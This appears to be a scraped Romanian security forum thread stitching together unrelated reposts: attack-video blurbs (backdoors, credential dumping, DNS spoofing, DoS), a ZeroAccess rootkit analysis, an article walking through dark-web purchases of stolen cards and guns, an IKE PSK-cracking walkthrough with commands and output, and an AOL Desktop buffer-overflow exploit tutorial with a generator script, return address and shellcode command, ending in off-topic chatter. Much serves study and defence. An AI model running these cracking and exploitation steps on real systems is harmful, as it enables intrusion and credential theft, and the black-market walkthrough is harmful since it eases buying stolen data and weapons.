Nytro

[h=4]Athcon 2011 Exploiting Anti-Reversing Techniques[/h] Description: AthCon IT Security Conference Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization. Speaker: Kyriakos Economou Sursa: Athcon 2011 Exploiting Anti-Reversing Techniques

[h=4]Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec[/h] Description: Athcon IT Security Conference Title: Win32 Exploit Development with pvefindaddr + Project Quebec Speaker: Peter Van Eeckhoutte Sursa: Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec

[h=4]Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"[/h] Description: "Attacking VoIP and understanding what cyber-crime is doing" Sursa: Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"

[h=4]Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"[/h] Description: "The DHCP Recession: Extended DHCP Exhausting attack" Sursa: Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"

[h=4]Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices[/h] Description: Mobile privacy: Tor on the iPhone and other unusual devices Sursa: Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices"

[h=4]Microsoft Windows Eot Font Table Directory Integer Overflow.[/h] Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. Sursa: Microsoft Windows Eot Font Table Directory Integer Overflow.

[h=4]Intersect Framework :: Install Persistent Backdoors[/h] Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files). Intersect homepage: http://github.com/ohdae/Intersect-2.5/ Sursa: Intersect Framework :: Install Persistent Backdoors

[h=4]Social Engineer-Toolkit And Windows Credentials Editor[/h] Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett Sursa: Social Engineer-Toolkit And Windows Credentials Editor

[h=4]Spoofing Dns With Nmap Fast Track Script[/h] http://www.youtube.com/watch?v=uAfk-_j-EUM&feature=player_embedded Description: spoofing DNS -spoof all websites nmap fast tarck script www.4shared.com/rar/4n4nYdcO/nmapf.html Sursa: Spoofing Dns With Nmap Fast Track Script

[h=4]Dos Attack On Win8 With Hping3 (Packet Flooding)[/h] Description: DOS Attack on Win8 with Hping3 (Packet Flooding) Sursa: Dos Attack On Win8 With Hping3 (Packet Flooding)

[h=4]Arbitrary File Upload And Bypassing Protections(Dvwa)[/h] Description: in this demo , we will bypass upload protections to upload an arbitrary file, and demonstrating how can we bypass file upload protection techniques that is used in DVWA Sursa: Arbitrary File Upload And Bypassing Protections(Dvwa)

[h=4]Dns Spoofing Plus Wpad Equals Compromised[/h] Description: [[Web found this is not my video but wanted to share it with securitytube]] How hard is it for someone to insert a proxy between you and the rest of the Internet without you knowing? Will running a Mac or Linux protect you? In this episode we combine the concepts from Episode 20 with the WPAD style attack that was discussed back in Episode 17, creating a quick and easy how-to when it comes to creating a man in the middle attack that will work against any system that has Automatic Proxy Discovery enabled. This feature is sometimes thought to be a Windows specific issue, but as we demonstrate here by transparently creating a man in the middle proxy for a Mac, it really does apply everywhere. There are just a few simple pieces that you need to accomplish this attack and there are some quick and easy things that you can do to defend yourself or that you can look for during an audit. For more details and a link to the source code, please check the Blog article here: IT Security Audit: What About WPAD?/ Sursa: Dns Spoofing Plus Wpad Equals Compromised

[h=4]Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks![/h] Description: [[ web found i did not make this video but wanted to share it with securitytube]] WPAD is a terrific protocol for ease of configuration, but it's also a phenomenal protocol for hackers and penetration testers. This short video will describe the issue, demonstrate how it's exploited and give you quick and easy suggestions that you can use to protect your business network or protect yourself personally when you're using your web browser in Starbuck's or McDonald's! For more demonstrations, tips and tricks, visit Auditcasts. For an in-depth discussion of this issue and how to solve it, visit http://audit.sans.org/blog Sursa: Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks!

[h=4]Exploit Pack - Web Security 2.2[/h] http://www.youtube.com/watch?v=jCR5TSTmtJE&feature=player_embedded Description: Exploit Pack - Web Security Take control of remote browsers, steal social network credentials, obtain persistence on remote browsers, Distributed denial of service and more. Follow me on twitter: @exploitpack Skype me: juansacco Sursa: Exploit Pack - Web Security 2.2

[h=4]Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)[/h] Description: This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation. Sursa: Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)

[h=1]Targeting ZeroAccess Rootkit’s Achilles’ Heel[/h]Monday, April 30, 2012 at 4:17pm by Aditya Kapoor [h=2]Proliferation[/h] ZeroAccess is one of the most talked and blogged [1], [2] about rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered and which is still continuing to evolve. The ZeroAccess rootkit is distributed via both social engineering as well as exploitation. A recent blog post by our colleagues at McAfee, describes some of the odd methods this rootkit adopts to get installed on machines without getting noticed. One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware on the infected system. This botnet is reportedely [3] involved in clickfraud, downloading rogue antivirus applications, and generating spam. This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detection over the past week. Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily. And the trend is continuing upward. [h=2] Installation[/h] In my recent analysis of this rootkit , I was looking to understand the initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Usually Step 1 varies in different variants i.e. some variants would directly overwrite a legitimate driver and some others would first inject the malicious code in trusted processes like explorer.exe and then, from the injected code, overwrite the driver (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver, which is overwritten in Step 2, is randomly selected (details here [1]), in our discussion below we assume CDROM.sys is being overwritten. Step 2 to Step 8 are fairly static in variants of ZeroAccess. Once the driver is overwritten by malicious code it is loaded in kernel space. The first task of the kernel mode code is to ensure that it sets up the malware to survive reboots and to forge the view of overwritten driver (CDROM.sys). Lets move on to see how this scheme works in Step 5 – Step 8. In Step 5, ZeroAccess intercepts disk i/o by hooking DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk i/o would go through rootkit’s malicious routine. In Step 6, the kernel mode code has the access to clean image of CDROM.sys driver stored in memory and to survive reboots it flushes the file using ZwFlushVirtualMemory API to disk. The request to flush the clean image is interestingly sent to the file CDROM.sys, which at first glance looks counter intuitive. Why would the rootkit want to the write clean image to the file it just infected in Step 2? Looking more closely, the rootkit actually uses its disk i/o redirection framework. So, when this request to store the clean image of file on disk traverses through the virtual driver stack shown in Step 7, it is encrypted and redirected ( Step 8 ) to the rootkits “protected” folder that it created in Step 3, instead of going to the actual CDROM.sys. Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys would have to traverse the hijacked i/o path , where, the rootkit decrypts the original file from its protected storage on the fly and presents the clean image, thus forging the view of the file to security tools. Also during reboot the infected file would first load the malicious code in kernel which can refer to its “protected” folder and load the original file in kernel thus ensuring uninterrupted functionality of the original device. In order to clean this threat, security tools have to take several steps in repairing either memory or decrypting the files its protected folder so that they can restore the original file. Also once the rootkit is active in kernel mode it takes lot of evasive steps to kill or circumvent the security tools as described by our colleages in this Virus Bulletin article. So repair becomes even more challenging and research costly. [h=2]Impact of real time kernel monitoring[/h] I tested many variants spanning over an year of this rootkit family against McAfee’s Deep Defender technology which provides real time protections against unauthorized kernel memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to rootkits survival. Once this hook is blocked the machine was cleaned after a reboot, without any fancy repairs and it actually shaved off days of reverse engineering and writing custom repair against this rootkit and its multiple variants. It seemes as if Deep Defender hit right in the Achilles heel of the rootkit. [h=2]Is that it? How did Deep Defender clean the machine?[/h] No you did not miss part of the article, the interesting part is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked realtime the core functionality of rootkit. Lets revisit the attack strategy to understand what happened. When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender’s real time kernel memory protection saw the attempted change and recognized it is a malicious attempt to modify a critical structure and blocked the hijack attempt. With the hook gone, the rootkit could not hijack the disk i/o path, which means it cannot store any files in its “protected” folder anymore and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore as well. But the most interesting part is that the attempted hijack block by Deep Defender actually redirected the rootkit’s write attempt in Step 7 to go to its original location. So Step 8 would actually overwrite the original file that it just infected from user mode, thus forcing the rootkit to cleanup for us. After a reboot the system will be back in the clean state. This strategy from Deep Defender works against all the current ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state and without being noticed by the security tools which would catch them red handed if they cannot forge the view of the file anymore. Sursa: Targeting ZeroAccess Rootkit’s Achilles’ Heel | Blog Central

[h=1]Subterfuge - Man-in-the-Middle Attack Framework Tutorial[/h]By Irfan Shakeel Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool. The video below show you how to configure subterfuge on your computer, the operating system shown in the video is backtrack 5 but you can install subterfuge in other Linux distribution because subterfuge install dependencies by itself. So this is a small video in the subterfuge tutorial I will show you how to perform the various attack. Do not forget to comment about this wonderful tool and do not forget to share your experiences regrading the framework. Sursa: Subterfuge - Man-in-the-Middle Attack Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security

[h=1]How online black markets work[/h] [h=2]Corporate investigator Brandon Gregg looks at how bitcoins and Tor make ********* black markets tick[/h] [h=3]By Brandon Gregg, CPP[/h]April 30, 2012 — CSO — The internet is no stranger to crime. From counterfeit and stolen products, to illegal drugs, stolen identities and weapons, nearly anything can be purchased online with a few clicks of the mouse. The online black market not only can be accessed by anyone with an Internet connection, but the whole process of ordering illicit goods and services is alarmingly easy and *********, with multiple marketplaces to buy or sell anything you want. Understanding how the market thrives—unregulated and untraceable—can give you a better sense of the threats (or resources) that affect you and your business. In our scenario we are going to legally transfer $1,000 USD out of a regular bank account and into a mathematical system of binary codes, and then enter a neighborhood of the Internet largely used by criminals. This hidden world anyone lets purchase bulk downloads of stolen credit cards, as well as a credit card writer, blank cards, some "on stage" fake identities—and maybe even a grenade launcher they've had their eyes on. A journey into the darker side of the Internet starts with two open-source programs: Bitcoin and the Tor Bundle. [h=3]Moving Money[/h] Bitcoin (Bitcoin - P2P digital currency) is system tool that will act as a personal bank for storing and investing digital currency on your computer. Once it's installed on your system, it sits empty like a piggy bank, waiting to be filled with untraceable digital cash. Getting it filled is the tricky part. The digital monetary system online is predominately operated by the likes of Paypal, Western Union, and banking companies that try to follow government regulations to prevent fraud and money laundering. There are two steps to legally take money and have it converted at the current Bitcoin rate into BTCs in our digital and ********* bank. Start by opening a Dwolla (www.dwolla.com) banking account with no fees. You can use your real information—you aren't doing anything illegal. In about three days you will be given a fraud test and have to identify small transfers in your Dwolla and personal bank account. Once your account is confirmed, wire any amount from your personal bank to Dwolla from a lump sum or the estimated price of your purchase you have in mind. After you confirm the transfers, your legit money will now be stored in a new global bank with less restriction than US banks. Next you need to set up an account with the largest bitcoin exchanger, MtGox. Due to fraud concerns, MtGox will only allow transfers from banks like Dwolla. After your Dwolla transfer moves to MtGox, you can use the money to purchase Bitcoins on the open market for a small percentage-based fee. Once this sale is complete, your bitcoins are best stored in your own bank account that is residing digitally on your computer. The whole process can be completed in less than a week, and the $1,000 USD is now exchanged to $191 BTC. Now you are ready to go shopping on the black market. [h=3]Finding Markets[/h] The conversion of dollars to Bitcoins was legal and relatively safe. Actually engaging in black market shopping, though, connects you to various kinds of illegal activities. We'll continue our walkthrough but we are NOT endorsing these activities. This information can help security professionals understand how stolen identities and credit cards are used, how products are fenced or distributed illegally, and more. Clearly anyone engaging in black market activity wants to remain *********. So the next step in black market shopping is to download and open the Tor Bundle Pack (https://www.torproject.org/). We have touched on Tor two or three times to protect your identity while online, but Tor includes other functions. Developed by the US Navy for secret communications and now used to circumvent blocked websites at offices across the country and to inspire Arab Springs, TOR has a darker cousin: Hidden Tor Servers. The same random spider-web routing of Internet traffic that hides an end use's IP and location from any prying eyes can hide server locations too. Hidden Tor Servers are now the norm for storing, accessing and hiding illicit activity such as child pornography. The level of protection provided by Tor makes law enforcement's job tracking such activities next to impossible. (Interestingly, the hacktivist group ********* has recently brought attention to such evil servers by controlling them as DDOS servers against some of their targets, including law enforcement and government groups. If the CIA is struck with a DDOS attack, the agency suffers but also, in investigating the source of the attack, discovers the child pornography and hopefully cracks the pornography ring.) Hidden Tor Servers are likewise home to much black market activity. [Also read Online seller of counterfeit credit cards gets prison time] Where does one find "the black market"? What does it look like? Of course, Google search answers these questions easily. Using your Tor browser (which, yes, is much slower than a standard browser) search for "Tor Directories". These websites offer a collection of Tor's hidden web pages for all kinds of storefronts. Here you will find websites similar to the Yahoo's early days, categorizing storefronts including Drugs, Weapons and other illegal goods and activities. If the directory (or store) is listed with a standard .com or .org domain, it will open in your standard browser; if it ends in .onion then it means it's a hidden server only viewable on the Tor browser. One example is the Nobody@Zerodays website (nobody.zerodays.org/hidden-directory/), which offers reviews and direct links to current Hidden Tor sites. In our scenario we are going to check out the Black Market Reloaded and look for the current price of some credit cards and tools. Using Tor you can quickly jump to the Black Market Reloaded website, register (no real information needed), and start shopping. As on Amazon, sellers show off their products with details, pictures and pricing, including feedback collected from past buyers. On a given day in April, current pricing for bulk credit cards is running at $6.5 BTC with great seller feedback. One seller advertises: "All of our Products are coming with full given Information. That means: All needed information like cardnumber, security code, expiration date, name, address, city, state, zipcode, country, phone, SSN, DOB, security question etc. is given. Also Track 1+2 data and PIN. All CCs are checked and have a minimum Balance of 1000¬/$, and most of them are from an EU-Country. We also have US-Cards, but it's easier to cashout the money at ATMs (/buy virtual money online/link the CC to PayPal) with european ones." A "Credit card reader/writer, HiCo/LoCo, all ISO complete" is going for 76.60350 BTC (or $366.63 USD at the time of our exchange) and there are also a handful of unregistered handguns, including a brand new M9 Tactical handgun with an illegal silencer, unregistered of course, for 225.00000 BTC or $1,076.87 USD. Anyone who executes these purchases via ********* bitcoins will leave no trace of the transaction. All users can send data via Hidden Tor email servers, or ship physical items like drugs and weapons with the US Postal Service to prevent any searches without a warrant. When shipments come from within the US, the illegal goods are likely to arrive at the right mailbox without incident. For those who want an added layer of protection—say in the event that good are being shipped from outside the US—many people in the "Services" section of this site will buy and/or receive items on your behalf using their own bitcoins and addresses, and then remail the goods to you, for a small fee. (Also, some users of these sites will offer to sell you bitcoins via Paypal so you can skip the two banking steps above and jump right into buying your goods; there is of course no guarantee that you will receive your bitcoins after giving up your cash.) [Also read Facebook, SEO and black-hat tactics colliding—still] Tor's Hidden Servers provide a real insight to an underground world that once was limited to dark alleys, shady places, and dangerous criminals. Much like the Internet has expanded our e-commerce into a borderless global market, bitcoins and Tor have made shopping for illicit goods and services almost as easy as ordering an iTunes song on your computer. As a reminder, most of the purchases described here are illegal and/or dangerous. While it's extremely difficult to identify the individuals involved without additional intel, law enforcement personnel and corporate investigators can use these processes to keep tabs on the flow of stolen, counterfeit, or diverted goods. If these transactions are being executed on your corporate network, that activity can expose your organization to legal and other risks. While network logs will not show the Tor websites, software audits for programs like TOR, network sniffing of actual traffic, computer monitoring and computer forensics can show employers who is using TOR sites and what they are doing. Brandon Gregg is a corporate investigations manager. Sursa: How online black markets work - CSO Online - Security and Risk

[h=1]Angajatii lui Zuckerberg se imbogatesc inca de la angajare. Cat castiga un student fara experienta la Facebook[/h] [h=2] Fondatorul Facebook, Mark Zuckerberg, isi rasplateste regeste internii. Mai mult, cei care ajung in practica in compania antreprenorului marturisesc ca reusesc sa stranga intr-un an suficienti bani cat sa-si permita apoi diverse extravagante. [/h] 28 aprilie 2012 06:00 | 659 vizualizari | autor: incont.ro Un salariu mediu pentru un practician care se ocupa de dezvoltarea de software in cadrul Facebook este peste 5.000 de dolari pe luna, potrivit Business Insider. Daca nu luam in calcul impozitele pe care practicantii le platesc catre statul american, onorariul acestora ajung la 60.000 de dolari pe an, destul de multi bani pentru cineva cu putina experienta in programare. Ba mai mult, exista interni si mai norocosi. Conform unor surse citate de Business Insider, unii studenti sau masteranzi ajunsi in practica la reteaua de socializare castiga si 6.800 de dolari pe luna, bani la care se adauga o bursa pentru cheltuielile personale, in valoare de 1.000 de dolari. Media salariala pentru un inginer care se ocupa cu programarea la Facebook este de 6.229 de dolari, scrie si GlassDoor.com. Facebook vrea sa atraga aproximativ 5 miliarde de dolari prin listarea la bursa, pregatind cea mai mare oferta publica initiala efectuata vreodata in industria IT, care i-ar putea asigura o capitalizare de pana la 100 miliarde de dolari. Analistii considera ca investitorii se vor bate pe actiunile Facebook in cadrul ofertei publice initiale, insa semnalele negative privind incetinirea cresterii i-ar putea determina pe unii sa nu devina actionari pe termen lung. Facebook, fondata in 2004 de Mark Zuckerberg, a depasit in primul trimestru pentru prima data pragul de 900 milioane de utilizatori activi lunar. Compania a angajat 1.100 de persoane in ultimele 12 luni, numarul total de angajati ajungand la 3.539, potrivit raportarilor inaintate luni seara Comisiei pentru valori mobiliare din SUA. Cheltuielile s-au dublat in ultimele 12 luni, in timp ce veniturile au urcat cu numai 45%, a precizat compania. Profitul net a scazut astfel cu 12% in primul trimestru, la 205 milioane de dolari, de la 233 milioane de dolari in perioada corespunzatoare a anului trecut. Veniturile au totalizat 1,06 miliarde de dolari, in scadere cu 6% fata de trimestrul al patrulea. Pe langa incetinirea cresterii, Facebook are si probleme legate de drepturile de proprietate intelectuala si brevete. Yahoo a dat in judecata Facebook pentru incalcarea unor brevete, in timp ce reteaua de socializare incearca sa-si consolideze portofoliul de drepturi de proprietate intelectuala pentru a evita viitoare infruntari in instanta. Facebook a anuntat luni ca va plati 550 milioane de dolari catre Microsoft, pentru un portofoliu de cateva sute de brevete. Sursa: Angajatii lui Zuckerberg se imbogatesc inca de la angajare. Cat castiga un student fara experienta la Facebook - www.InCont.ro

[h=3]Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain[/h] Kislay Bhardwaj - 1:50 AM In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. It looks like this: $ [COLOR=red]sudo ike-scan 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify $ [COLOR=red]sudo ike-scan -A 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) To save with some output: $ [COLOR=red]sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key[/COLOR] Once you have you psk file to crack you're stuck with two options psk-crack and cain psk-crack is fairly rudamentary to brute force: $[COLOR=red] psk-crack -b 5 192-168-207-134key[/COLOR] Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= $[COLOR=red] psk-crack -b 5 --[/COLOR]charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key Running in brute-force cracking modde Brute force with 63 chars up to length 5 will take up to 992436543 iterations To dictionary attack: $ [COLOR=red]psk-crack -d /path/to/dictionary 192-168-207-134key[/COLOR] Running in dictionary cracking mode no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack. Sursa: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

[h=3]Exploit writing: A basic Idea.[/h] Kislay Bhardwaj - 1:59 PM Exploit Writing Made Easier With !pvefindaddr A few notes before we begin, covering what this paper is about and what it isn’t about: 1. This paper is intended to demonstrate the efficiency of !pvefindaddr. 2. This paper will not explain the exploit till the end, if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow Now let’s start! Required software: Immunity Debugger !pvefindaddr AOL Desktop v9.6 Required knowledge: Understanding how buffer overflows work. Exploiting techniques. A programming language (I use python). I’ve heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated or when trying to test multiple dll’s for SAFESEH or ASLR, that’s where !pvefindaddr comes in. What is !pvefindaddr !? Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage Ok, let us get started ! Install AOL Desktop v9.6 (A quick note here, if the app doesn’t work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes then run the app). Now let’s make the exploit skeleton (I won’t remake the full exploit, if you want to check it out it’s on the top of the page), it will contain two standard headers and between them our buffer, let’s check it out: **************************************** #!/usr/bin/python # The First Header hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22" "\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41" "\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22" "\x68\x74\x74\x70\x3a\x2f\x2f") # The Second Header hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52" "\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f" "\x48\x54\x4d\x4c\x3e\x0d\x0a") payload='\x90'* 6000 exploit = hd1+payload+hd2 try: file=open('exploit.rtx','w') file.write(exploit) file.close() print 'File created, time to PEW PEW!\n' except: print 'Something went wrong!\n' print 'Check if you have permisions to write in that folder, of if the folder exists!' **************************************** Generate the file using the exploit and after that open it in AOL Desktop and as we can see we could overwrite EIP with our ‘\x90’’s: So what would be next ? Calculating the exact offset until EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again). In our debugger we can either click on the PyCommands button and select from the list ! pvefindadrr and then enter the arguments or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger like this: As you can see it said “check mspattern.txt” so we go in the Immunity Debugger folder and open up mspatters.txt, copy the pattern in our exploit and regenerate the malicious file. After opening the malicious file containing our pattern: We can see that our EIP is 35784734 and we also can see that ESI points in our buffer, now in order to determine the exact offset we will use another feature from !pvefindaddr. Normally with metasploit we would try pattern_offset EIP now, well with !pvefindaddr we can actually get more info, let’s try the findmsp function. After it is done just open the Log Windows and as we can see, we have some nice information: So it found the first characters from the patters in davclnt.dll then it checked register addresses, we have the EIP overwite address beginning at 5384 and the register who points in to the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368 it even checked the SEH chains to see if it finds the pattern there and we also have the “Walking stack” which if you haven’t guessed by now it actually tells us when the ESP contains a pointer to our buffer at the position 4360. This is a nice feature but we have one that does even better, !pvefindaddr also has a function that runs a findmsp and after that based on the results and on the stack it acutally gives us information about the type of exploit and how it should be made, let’s check it out. !pvefindaddr suggest Sweet huh ? Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. now these are simple instructions we can find them but what if we want to find these instructions without null bytes, from specific modules, etc. (NOTE: I’m not saying this can’t be done manual, only saying that it will take more time and this way it’s much easier). Let’s say we want to make this exploit using an universal address (like the original exploit), searching for this instruction can take a lot of time, mostly because it’s a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and some specific chatacteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics, once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.: Once we can see which modules we can use we can start searching for the specific instruction using the command: !pvefindaddr j -r ESI -n -o (this might take some time, go get a beer or something.) This function searches for pointers that jump to a specific register (ESI in our case), the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-aslr modules also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (We want to make it universal). After a little search we find a nice intruction at 20C5CFC0 from aolusershell.dll, this one should work perfect. After we are done we can also use compare to check in order to compare some bytes (usually our shellcode) from a file with some bytes in memory it also compares unicode expanded instances, ok now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like: msfpayload windows/exec CMD=calc.exe R > shellcode There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki: **************************************** my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here open(FILE,">c:\\temp\\shellcode.bin"); binmode FILE; print FILE $shellcode; close(FILE); **************************************** We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it: !pve finder compare C:\shellcode After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder: Now a quick review on what we managed to do in this tutorial: - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer. - We have found our type of exploit, and some information on how to structure it - Found out which modules have SAFESEH, ASLR or get rebased - Found the instruction we needed avoiding these modules and the OS modules aswell - Checked if our shellcode contains bad characters. So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time. Sursa: Kislay Bhardwaj: Exploit writing: A basic Idea.

Da, frumos...

Informatica @ Universitate: Anul I, semestrul I: - Programare procedurala (limbajul C) - Logica matematica (pula Boole, porcarie) - Algebra (cacat) - Analiza (cacat si mai mare) - Algoritmi si structuri de date (sortari, arbori, util) - Arhitectura calculatorului (cum arata un procesor, interesant, laborator de ASM, util) Anul I, semestrul II: - Programare orientata pe obiecte (C++, important) - Analiza II (cacat) - Algebra II (cacat) - Algoritmica grafurilor (prea teoretic, naspa) - Geometrie (tot cacat) - Limbaje formale si automate (nu prea stiu despre ce e vorba) Anul II, semestrul I: - tehnici web: HTML, CSS si Javascript (practic) - geometrie computationala (cam teoretic, cred) - calculabilitate si complexitate (optimizari, util) - tehnici avansate de programare (java, foarte util) - sisteme de operare (Linux, C++ sub Linux, super tare) - probabilitati (nu stiu exact, cred ca mate, deci naspa) Anul II, semestrul II: - statistica (profa buna, porcarie in rest) - retele de calculatoare (Java sockets, RMI si serializare, util) - metode de dezvoltare software (porcarie la care trebuie orice proiect) - inteligenta artificiala (nu stiu exact, laborator de Prolog) - programare logica (prof naspa, laborator de Maude, un limbaj ciudatel dar interesant) - baze de date (teorie la curs, laborator de Oracle) Cam atat deocamdata, daca vreti alte informatii, cereti.

begood: E ok asa? Acela e ID-ul? Nemessis: Noi avem acces la baza de date, nu cred ca o sa fie probleme. Oricum, majoritatea ne cunoastem intre noi. Sau hai in cacat sa facem si noi un meeting...

SecureCRT.